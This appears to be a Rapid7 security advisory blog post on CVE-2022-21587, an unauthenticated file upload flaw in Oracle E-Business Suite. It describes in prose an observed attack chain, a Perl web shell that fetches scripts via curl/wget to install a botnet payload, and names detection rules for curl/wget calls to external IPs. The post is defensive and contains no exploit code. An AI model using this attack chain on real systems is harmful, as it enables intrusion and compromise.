9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.
Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-21587, a critical arbitrary file upload vulnerability (rated 9.8 on the CVSS v3 risk metric) impacting Oracle E-Business Suite (EBS). Oracle published a Critical Patch Update Advisory in October 2022 which included a fix, meanwhile, CISA added CVE-2022-21587 to its Known Exploited Vulnerabilities (KEV) catalog on February 2, 2023.
> Oracle E-Business Suite is a packaged collection of enterprise applications for a wide variety of tasks such as customer relationship management (CRM), enterprise resource planning (ERP), and human capital management (HCM).
CVE-2022-21587 can lead to unauthenticated remote code execution.
On January 16, 2023, Viettel Security published an analysis of the issue detailing both the vulnerabilityβs root cause and a method of leveraging the vulnerability to gain code execution. An exploit based on the Viettel Security analysis technique was published on GitHub by βHMsβ on February 6, 2023.
On February 8, 2023, Rapid7 posted a technical analysis of CVE-2022-21587 on AttackerKB. Of particular note, we found that it is possible to upload arbitrary Java Server Pages (JSP) allowing for exploitation beyond the Perl web shell that has been observed so far.
The attacker(s) are using the above-mentioned proof of concept exploit, uploading a perl script, which fetches (via curl/wget) additional scripts to download a malicious binary payload making the victim host part of a botnet.
InsightVM & Nexpose customers: Authenticated vulnerability checks for CVE-2022-21587 have been available since November 2022. Note that these require valid Oracle Database credentials to be configured in order to collect the relevant patch level information.
InsightIDR & Managed Detection & Response (MDR) customers: in our current investigations, the previously existing detections have been triggering post exploitation:
Suspicious Process - Wget to External IP Address
Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port
Weβre also testing new rules more specific to Oracle E-Business Suite.
February 8, 2023 18:15 UTC